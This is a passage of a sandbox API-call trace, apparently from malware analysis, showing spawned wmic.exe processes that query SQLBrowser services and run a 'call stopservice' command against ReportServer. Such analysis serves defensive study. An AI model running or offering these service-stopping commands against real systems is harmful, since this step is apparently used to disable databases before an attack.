IWbemClassObject:NextMethod (in: This=0x910088, lFlags=0, pstrName=0x35dc18*=0x0, ppInSignature=0x35dc14*=0x0, ppOutSignature=0x35dc10*=0x0 | out: pstrName=0x35dc18*="GetSecurityDescriptor", ppInSignature=0x35dc14*=0x0, ppOutSignature=0x35dc10*=0x910280) returned 0x0 [0278.244] lstrlenW (lpString="GetSecurityDescriptor") returned 21 [0278.244] lstrlenW (lpString="stopservice") returned 11 [0278.244] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="GetSecurityDescriptor", cchCount2=21) returned 3 [0278.244] IUnknown:Release (This=0x910280) returned 0x0 [0278.244] IWbemClassObject:NextMethod (in: This=0x910088, lFlags=0, pstrName=0x35dc18*=0x0, ppInSignature=0x35dc14*=0x0, ppOutSignature=0x35dc10*=0x0 | out: pstrName=0x35dc18*="SetSecurityDescriptor", ppInSignature=0x35dc14*=0x910280, ppOutSignature=0x35dc10*=0x912d38) returned 0x0 [0278.244] lstrlenW (lpString="SetSecurityDescriptor") returned 21 [0278.244] lstrlenW (lpString="stopservice") returned 11 [0278.244] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="SetSecurityDescriptor", cchCount2=21) returned 3 [0278.244] IUnknown:Release (This=0x910280) returned 0x0 [0278.244] IUnknown:Release (This=0x912d38) returned 0x0 [0278.244] IWbemClassObject:NextMethod (in: This=0x910088, lFlags=0, pstrName=0x35dc18*=0x0, ppInSignature=0x35dc14*=0x0, ppOutSignature=0x35dc10*=0x0 | out: pstrName=0x35dc18*=0x0, ppInSignature=0x35dc14*=0x0, ppOutSignature=0x35dc10*=0x0) returned 0x40005 [0278.244] IUnknown:Release (This=0x910088) returned 0x0 [0278.245] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0278.245] lstrlenW (lpString="SET") returned 3 [0278.245] lstrlenW (lpString="call") returned 4 [0278.245] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0278.245] lstrlenW (lpString="CREATE") returned 6 [0278.245] lstrlenW (lpString="call") returned 4 [0278.245] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0278.245] free (_Block=0x8629a0) [0278.245] malloc (_Size=0x4) returned 0x862ee8 [0278.245] lstrlenW (lpString="GET") returned 3 [0278.245] lstrlenW (lpString="call") returned 4 [0278.245] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0278.245] lstrlenW (lpString="LIST") returned 4 [0278.245] lstrlenW (lpString="call") returned 4 [0278.245] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0278.245] lstrlenW (lpString="ASSOC") returned 5 [0278.245] lstrlenW (lpString="call") returned 4 [0278.246] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="ASSOC", cchCount2=5) returned 3 [0278.246] WbemLocator:IUnknown:AddRef (This=0x8b4920) returned 0x3 [0278.246] free (_Block=0x862788) [0278.246] lstrlenW (lpString="") returned 0 [0278.246] lstrlenW (lpString="NQDPDE") returned 6 [0278.246] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="", cchCount2=0) returned 3 [0278.246] lstrlenW (lpString="NQDPDE") returned 6 [0278.246] malloc (_Size=0xe) returned 0x86ab40 [0278.246] lstrlenW (lpString="NQDPDE") returned 6 [0278.246] GetCurrentThreadId () returned 0x518 [0278.246] GetCurrentProcess () returned 0xffffffff [0278.246] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x35fcf4 | out: TokenHandle=0x35fcf4*=0x2f8) returned 1 [0278.246] GetTokenInformation (in: TokenHandle=0x2f8, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x35fcf0 | out: TokenInformation=0x0, ReturnLength=0x35fcf0) returned 0 [0278.246] malloc (_Size=0x118) returned 0x86b9c8 [0278.246] GetTokenInformation (in: TokenHandle=0x2f8, TokenInformationClass=0x3, TokenInformation=0x86b9c8, TokenInformationLength=0x118, ReturnLength=0x35fcf0 | out: TokenInformation=0x86b9c8, ReturnLength=0x35fcf0) returned 1 [0278.247] AdjustTokenPrivileges (in: TokenHandle=0x2f8, DisableAllPrivileges=0, NewState=0x86b9c8*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0278.247] free (_Block=0x86b9c8) [0278.247] CloseHandle (hObject=0x2f8) returned 1 [0278.247] lstrlenW (lpString="GET") returned 3 [0278.247] lstrlenW (lpString="call") returned 4 [0278.247] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0278.247] lstrlenW (lpString="LIST") returned 4 [0278.247] lstrlenW (lpString="call") returned 4 [0278.247] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0278.247] lstrlenW (lpString="SET") returned 3 [0278.247] lstrlenW (lpString="call") returned 4 [0278.247] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0278.247] lstrlenW (lpString="CALL") returned 4 [0278.247] lstrlenW (lpString="call") returned 4 [0278.247] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0278.248] ??0CHString@@QAE@XZ () returned 0x35fcb4 [0278.248] GetCurrentThreadId () returned 0x518 [0278.248] malloc (_Size=0xc) returned 0x86ab58 [0278.248] malloc (_Size=0xc) returned 0x86aba0 [0278.248] malloc (_Size=0xc) returned 0x86abb8 [0278.248] malloc (_Size=0xc) returned 0x86abd0 [0278.248] malloc (_Size=0xc) returned 0x8698e0 [0278.248] SysStringLen (param_1="\\\\") returned 0x2 [0278.248] SysStringLen (param_1="NQDPDE") returned 0x6 [0278.248] malloc (_Size=0xc) returned 0x86be30 [0278.248] SysStringLen (param_1="\\\\NQDPDE") returned 0x8 [0278.249] SysStringLen (param_1="\\") returned 0x1 [0278.249] malloc (_Size=0xc) returned 0x86be48 [0278.249] SysStringLen (param_1="\\\\NQDPDE\\") returned 0x9 [0278.249] SysStringLen (param_1="root\\cimv2") returned 0xa [0278.249] free (_Block=0x86be30) [0278.249] free (_Block=0x8698e0) [0278.249] free (_Block=0x86abd0) [0278.249] free (_Block=0x86abb8) [0278.249] free (_Block=0x86aba0) [0278.249] free (_Block=0x86ab58) [0278.249] malloc (_Size=0xc) returned 0x86be90 [0278.249] malloc (_Size=0xc) returned 0x86bef0 [0278.250] malloc (_Size=0xc) returned 0x86bfe0 [0278.250] WbemLocator:IWbemLocator:ConnectServer (in: This=0x8b4920, strNetworkResource="\\\\NQDPDE\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xa68564 | out: ppNamespace=0xa68564*=0x910760) returned 0x0 [0278.261] free (_Block=0x86bfe0) [0278.261] free (_Block=0x86bef0) [0278.261] free (_Block=0x86be90) [0278.261] CoSetProxyBlanket (pProxy=0x910760, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0278.262] free (_Block=0x86be48) [0278.262] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0278.262] ??0CHString@@QAE@XZ () returned 0x35fcac [0278.262] GetCurrentThreadId () returned 0x518 [0278.262] malloc (_Size=0x38) returned 0x86b9c8 [0278.262] malloc (_Size=0x28) returned 0x86ba08 [0278.262] malloc (_Size=0x28) returned 0x86ba38 [0278.262] malloc (_Size=0x38) returned 0x86ba68 [0278.262] malloc (_Size=0x38) returned 0x86baa8 [0278.262] malloc (_Size=0x24) returned 0x86bae8 [0278.262] malloc (_Size=0xc) returned 0x86aba0 [0278.262] lstrlenA (lpString="") returned 0 [0278.262] malloc (_Size=0x2) returned 0x862788 [0278.262] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa22b74, cbMultiByte=-1, lpWideCharStr=0x862788, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0278.262] free (_Block=0x862788) [0278.263] malloc (_Size=0x38) returned 0x86bb18 [0278.263] malloc (_Size=0x24) returned 0x86bb58 [0278.263] malloc (_Size=0xc) returned 0x86abb8 [0278.263] free (_Block=0x86aba0) [0278.263] IWbemServices:GetObject (in: This=0x910760, strObjectPath="Win32_Service", lFlags=131072, pCtx=0x0, ppObject=0x35fc84*=0x0, ppCallResult=0x0 | out: ppObject=0x35fc84*=0x910088, ppCallResult=0x0) returned 0x0 [0278.332] malloc (_Size=0xc) returned 0x86ab58 [0278.333] IWbemClassObject:GetMethod (in: This=0x910088, wszName="stopservice", lFlags=0, ppInSignature=0x35fca0, ppOutSignature=0x35fc80 | out: ppInSignature=0x35fca0*=0x0, ppOutSignature=0x35fc80*=0x8e6ba8) returned 0x0 [0278.333] free (_Block=0x86ab58) [0278.333] IUnknown:Release (This=0x8e6ba8) returned 0x0 [0278.333] IUnknown:Release (This=0x910088) returned 0x0 [0278.333] ??0CHString@@QAE@XZ () returned 0x35fb64 [0278.333] GetCurrentThreadId () returned 0x518 [0278.333] malloc (_Size=0xc) returned 0x86ab58 [0278.333] lstrlenA (lpString="") returned 0 [0278.333] malloc (_Size=0x2) returned 0x862788 [0278.333] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa22b74, cbMultiByte=-1, lpWideCharStr=0x862788, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0278.333] free (_Block=0x862788) [0278.333] malloc (_Size=0xc) returned 0x86abd0 [0278.333] lstrlenA (lpString="") returned 0 [0278.333] malloc (_Size=0x2) returned 0x862788 [0278.334] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa22b74, cbMultiByte=-1, lpWideCharStr=0x862788, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0278.334] free (_Block=0x862788) [0278.334] malloc (_Size=0xc) returned 0x86aba0 [0278.334] free (_Block=0x86abd0) [0278.334] malloc (_Size=0xc) returned 0x86abd0 [0278.334] lstrlenA (lpString="SELECT * FROM ") returned 14 [0278.334] malloc (_Size=0x1e) returned 0x86bb88 [0278.334] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa24354, cbMultiByte=-1, lpWideCharStr=0x86bb88, cchWideChar=15 | out: lpWideCharStr="SELECT * FROM ") returned 15 [0278.334] free (_Block=0x86bb88) [0278.334] malloc (_Size=0xc) returned 0x8698e0 [0278.334] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0278.334] SysStringLen (param_1="Win32_Service") returned 0xd [0278.334] free (_Block=0x86abd0) [0278.335] malloc (_Size=0xc) returned 0x86abd0 [0278.335] malloc (_Size=0xc) returned 0x86be30 [0278.335] lstrlenA (lpString=" WHERE ") returned 7 [0278.335] malloc (_Size=0x10) returned 0x86bdd0 [0278.335] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa237a8, cbMultiByte=-1, lpWideCharStr=0x86bdd0, cchWideChar=8 | out: lpWideCharStr=" WHERE ") returned 8 [0278.335] free (_Block=0x86bdd0) [0278.335] malloc (_Size=0xc) returned 0x86bda0 [0278.335] SysStringLen (param_1=" WHERE ") returned 0x7 [0278.335] SysStringLen (param_1="name like '%%SQLBrowser%%'") returned 0x1a [0278.335] malloc (_Size=0xc) returned 0x86be00 [0278.335] SysStringLen (param_1="SELECT * FROM Win32_Service") returned 0x1b [0278.335] SysStringLen (param_1=" WHERE name like '%%SQLBrowser%%'") returned 0x21 [0278.335] free (_Block=0x8698e0) [0278.336] free (_Block=0x86bda0) [0278.336] free (_Block=0x86be30) [0278.336] free (_Block=0x86abd0) [0278.336] malloc (_Size=0xc) returned 0x86bef0 [0278.336] IWbemServices:ExecQuery (in: This=0x910760, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_Service WHERE name like '%%SQLBrowser%%'", lFlags=48, pCtx=0x0, ppEnum=0x35fb70 | out: ppEnum=0x35fb70*=0x914038) returned 0x0 [0278.353] free (_Block=0x86bef0) [0278.353] CoSetProxyBlanket (pProxy=0x914038, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0278.360] IEnumWbemClassObject:Next (in: This=0x914038, lTimeout=-1, uCount=0x1, apObjects=0x35fb6c, puReturned=0x35fb5c | out: apObjects=0x35fb6c*=0x0, puReturned=0x35fb5c*=0x0) returned 0x1 [0279.685] IUnknown:Release (This=0x914038) returned 0x0 [0279.688] free (_Block=0x86be00) [0279.688] free (_Block=0x86aba0) [0279.688] free (_Block=0x86ab58) [0279.688] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0279.688] free (_Block=0x86abb8) [0279.688] free (_Block=0x86bae8) [0279.688] free (_Block=0x86baa8) [0279.688] free (_Block=0x86ba68) [0279.688] free (_Block=0x86ba38) [0279.688] free (_Block=0x86ba08) [0279.688] free (_Block=0x86bb58) [0279.689] free (_Block=0x86bb18) [0279.689] free (_Block=0x86b9c8) [0279.689] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0279.689] GetCurrentThreadId () returned 0x518 [0279.690] ??0CHString@@QAE@PBG@Z () returned 0x35fd24 [0279.690] ??YCHString@@QAEABV0@PBG@Z () returned 0x35fd24 [0279.690] malloc (_Size=0x800) returned 0x86c0d0 [0279.690] LoadStringW (in: hInstance=0x0, uID=0xb3bc, lpBuffer=0x86c0d0, cchBufferMax=1024 | out: lpBuffer="No Instance(s) Available.\r\n") returned 0x1b [0279.690] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0279.691] malloc (_Size=0x1c) returned 0x86b9c8 [0279.691] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x86b9c8, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="No Instance(s) Available.\r\n", lpUsedDefaultChar=0x0) returned 28 [0279.691] __iob_func () returned 0x776f2608 [0279.691] fprintf (in: _File=0x776f2628, _Format="%s" | out: _File=0x776f2628) returned 27 [0279.691] __iob_func () returned 0x776f2608 [0279.691] fflush (in: _File=0x776f2628 | out: _File=0x776f2628) returned 0 [0279.692] free (_Block=0x86b9c8) [0279.692] free (_Block=0x86c0d0) [0279.692] ??1CHString@@QAE@XZ () returned 0x1 [0279.692] WbemLocator:IUnknown:Release (This=0x910760) returned 0x0 [0279.692] ?Empty@CHString@@QAEXXZ () returned 0x6d7c65f8 [0279.692] _kbhit () returned 0x0 [0279.699] free (_Block=0x862ee8) [0279.699] free (_Block=0x86ac90) [0279.700] free (_Block=0x86ab88) [0279.700] free (_Block=0x86ab28) [0279.700] free (_Block=0x86ac18) [0279.700] free (_Block=0x86b058) [0279.700] free (_Block=0x86b188) [0279.700] free (_Block=0x869da8) [0279.700] free (_Block=0x86b218) [0279.700] free (_Block=0x86ac48) [0279.700] free (_Block=0x862d20) [0279.700] free (_Block=0x860520) [0279.700] free (_Block=0x86bc98) [0279.700] free (_Block=0x86adc8) [0279.700] free (_Block=0x86adf8) [0279.700] free (_Block=0x86bc58) [0279.700] free (_Block=0x86bc18) [0279.700] free (_Block=0x86ad20) [0279.700] free (_Block=0x86ade0) [0279.700] free (_Block=0x86ab10) [0279.701] free (_Block=0x86bbe8) [0279.701] ?Empty@CHString@@QAEXXZ () returned 0x6d7c65f8 [0279.701] free (_Block=0x86b0f0) [0279.701] free (_Block=0x86ad68) [0279.701] free (_Block=0x860568) [0279.701] free (_Block=0x86ad08) [0279.701] free (_Block=0x86b1d0) [0279.701] free (_Block=0x86ac30) [0279.701] free (_Block=0x862d00) [0279.701] free (_Block=0x8626b0) [0279.701] free (_Block=0x8626f8) [0279.701] free (_Block=0x862740) [0279.701] free (_Block=0x86ab40) [0279.701] free (_Block=0x8627c8) [0279.701] free (_Block=0x860508) [0279.701] free (_Block=0x862ca0) [0279.701] free (_Block=0x8604f0) [0279.701] free (_Block=0x862b40) [0279.701] free (_Block=0x8604d8) [0279.701] free (_Block=0x8629c0) [0279.701] free (_Block=0x862908) [0279.701] free (_Block=0x862920) [0279.701] free (_Block=0x8628d0) [0279.701] free (_Block=0x8628e8) [0279.702] free (_Block=0x862940) [0279.702] free (_Block=0x862958) [0279.702] free (_Block=0x8604a0) [0279.702] free (_Block=0x8604b8) [0279.702] free (_Block=0x862860) [0279.702] free (_Block=0x862878) [0279.702] free (_Block=0x862828) [0279.702] free (_Block=0x862840) [0279.702] free (_Block=0x862898) [0279.702] free (_Block=0x8628b0) [0279.702] free (_Block=0x8627f0) [0279.702] free (_Block=0x862808) [0279.702] free (_Block=0x8627a0) [0279.702] free (_Block=0x861200) [0279.702] free (_Block=0x86afd0) [0279.702] WbemLocator:IUnknown:Release (This=0x8b4920) returned 0x2 [0279.702] WbemLocator:IUnknown:Release (This=0x8bac48) returned 0x0 [0279.703] WbemLocator:IUnknown:Release (This=0x8b4920) returned 0x1 [0279.703] ?Empty@CHString@@QAEXXZ () returned 0x6d7c65f8 [0279.703] WbemLocator:IUnknown:Release (This=0x8b4920) returned 0x0 [0279.703] free (_Block=0x86acd8) [0279.703] free (_Block=0x86adb0) [0279.703] free (_Block=0x862c40) [0279.703] free (_Block=0x86acf0) [0279.703] free (_Block=0x86ad80) [0279.703] free (_Block=0x862c80) [0279.704] free (_Block=0x86ae40) [0279.704] free (_Block=0x86ae88) [0279.704] free (_Block=0x862ae0) [0279.704] free (_Block=0x86ab70) [0279.704] free (_Block=0x86ad98) [0279.704] free (_Block=0x862b00) [0279.704] free (_Block=0x86ae58) [0279.704] free (_Block=0x86aeb8) [0279.704] free (_Block=0x862ac0) [0279.704] free (_Block=0x86aea0) [0279.704] free (_Block=0x86ae70) [0279.704] free (_Block=0x862b60) [0279.704] free (_Block=0x86ad50) [0279.704] free (_Block=0x86aca8) [0279.704] free (_Block=0x862d60) [0279.704] free (_Block=0x86ad38) [0279.704] free (_Block=0x86ac00) [0279.704] free (_Block=0x862ba0) [0279.704] free (_Block=0x869868) [0279.705] free (_Block=0x86aed0) [0279.705] free (_Block=0x8629e0) [0279.705] free (_Block=0x86ae10) [0279.705] free (_Block=0x86ae28) [0279.705] free (_Block=0x862a20) [0279.705] free (_Block=0x86ac60) [0279.705] free (_Block=0x86ac78) [0279.705] free (_Block=0x862a40) [0279.705] free (_Block=0x86acc0) [0279.705] free (_Block=0x86abe8) [0279.705] free (_Block=0x862d40) [0279.705] free (_Block=0x869988) [0279.705] free (_Block=0x8697f0) [0279.705] free (_Block=0x862b80) [0279.705] free (_Block=0x869928) [0279.705] free (_Block=0x869898) [0279.705] free (_Block=0x862aa0) [0279.706] free (_Block=0x869880) [0279.706] free (_Block=0x8699b8) [0279.706] free (_Block=0x862a00) [0279.706] free (_Block=0x8699a0) [0279.706] free (_Block=0x8698c8) [0279.706] free (_Block=0x862c20) [0279.706] free (_Block=0x869970) [0279.706] free (_Block=0x869808) [0279.706] free (_Block=0x862cc0) [0279.706] free (_Block=0x8698b0) [0279.706] free (_Block=0x869850) [0279.706] free (_Block=0x862bc0) [0279.706] free (_Block=0x869958) [0279.706] free (_Block=0x8698f8) [0279.706] free (_Block=0x862be0) [0279.706] free (_Block=0x869910) [0279.706] free (_Block=0x869940) [0279.706] free (_Block=0x862c00) [0279.706] free (_Block=0x869820) [0279.706] free (_Block=0x869838) [0279.707] free (_Block=0x862c60) [0279.707] CoUninitialize () [0279.739] exit (_Code=0) [0279.740] free (_Block=0x86aee8) [0279.752] free (_Block=0x861008) [0279.753] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0279.753] free (_Block=0x862e10) [0279.753] free (_Block=0x8627e0) [0279.753] free (_Block=0x860fe8) [0279.753] free (_Block=0x860fc8) [0279.753] free (_Block=0x860f98) [0279.753] free (_Block=0x860f78) [0279.753] free (_Block=0x860f48) [0279.753] free (_Block=0x860f08) [0279.753] free (_Block=0x860ee8) [0279.753] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0279.753] free (_Block=0x862ce0) Thread: id = 233 os_tid = 0x10e0 Thread: id = 234 os_tid = 0x10ac Thread: id = 235 os_tid = 0x864 Thread: id = 236 os_tid = 0xa4c Process: id = "18" image_name = "wmic.exe" filename = "c:\\windows\\syswow64\\wbem\\wmic.exe" page_root = "0x1ba9c000" os_pid = "0x111c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0x13b8" cmd_line = "\"C:\\WINDOWS\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%ReportServer%%'\" call stopservice" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 238 os_tid = 0x1114 [0279.989] GetModuleHandleA (lpModuleName=0x0) returned 0xa20000 [0279.989] __set_app_type (_Type=0x1) [0279.989] __p__fmode () returned 0x776f3c14 [0279.989] __p__commode () returned 0x776f49ec [0279.989] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xa59af0) returned 0x0 [0279.990] __wgetmainargs (in: _Argc=0xa681a8, _Argv=0xa681ac, _Env=0xa681b0, _DoWildCard=0, _StartInfo=0xa681bc | out: _Argc=0xa681a8, _Argv=0xa681ac, _Env=0xa681b0) returned 0 [0279.990] ??0CHString@@QAE@XZ () returned 0xa685ec [0279.990] malloc (_Size=0x18) returned 0x3200ef0 [0279.991] malloc (_Size=0x38) returned 0x3200f10 [0279.991] malloc (_Size=0x28) returned 0x3200f50 [0279.991] malloc (_Size=0x18) returned 0x3200f80 [0279.991] malloc (_Size=0x24) returned 0x3200fa0 [0279.991] malloc (_Size=0x18) returned 0x3200fd0 [0279.991] malloc (_Size=0x18) returned 0x3200ff0 [0279.991] ??0CHString@@QAE@XZ () returned 0xa688fc [0279.991] malloc (_Size=0x18) returned 0x3201010 [0279.991] ?Empty@CHString@@QAEXXZ () returned 0x6d7c65f8 [0279.991] SetConsoleCtrlHandler (HandlerRoutine=0xa53cc0, Add=1) returned 1 [0279.991] _onexit (_Func=0xa5f370) returned 0xa5f370 [0279.991] _onexit (_Func=0xa5f380) returned 0xa5f380 [0279.992] _onexit (_Func=0xa5f390) returned 0xa5f390 [0279.993] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0279.993] ResolveDelayLoadedAPI () returned 0x74a22590 [0279.993] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0279.998] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0280.009] CoCreateInstance (in: rclsid=0xa26a74*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xa26a84*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0xa68510 | out: ppv=0xa68510*=0x2ff4980) returned 0x0 [0280.102] GetCurrentProcess () returned 0xffffffff [0280.102] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x9cf9f4 | out: TokenHandle=0x9cf9f4*=0x194) returned 1 [0280.102] GetTokenInformation (in: TokenHandle=0x194, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x9cf9f0 | out: TokenInformation=0x0, ReturnLength=0x9cf9f0) returned 0 [0280.102] malloc (_Size=0x118) returned 0x32026b0 [0280.102] GetTokenInformation (in: TokenHandle=0x194, TokenInformationClass=0x3, TokenInformation=0x32026b0, TokenInformationLength=0x118, ReturnLength=0x9cf9f0 | out: TokenInformation=0x32026b0, ReturnLength=0x9cf9f0) returned 1 [0280.102] AdjustTokenPrivileges (in: TokenHandle=0x194, DisableAllPrivileges=0, NewState=0x32026b0*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0280.102] free (_Block=0x32026b0) [0280.102] CloseHandle (hObject=0x194) returned 1 [0280.102] malloc (_Size=0x40) returned 0x32026b0 [0280.102] malloc (_Size=0x40) returned 0x32026f8 [0280.102] malloc (_Size=0x40) returned 0x3202740 [0280.102] SetThreadUILanguage (LangId=0x0) returned 0x2cc0409 [0280.107] _vsnwprintf (in: _Buffer=0x3202740, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0x9cf97c | out: _Buffer="ms_409") returned 6 [0280.107] malloc (_Size=0x20) returned 0x3202788 [0280.107] 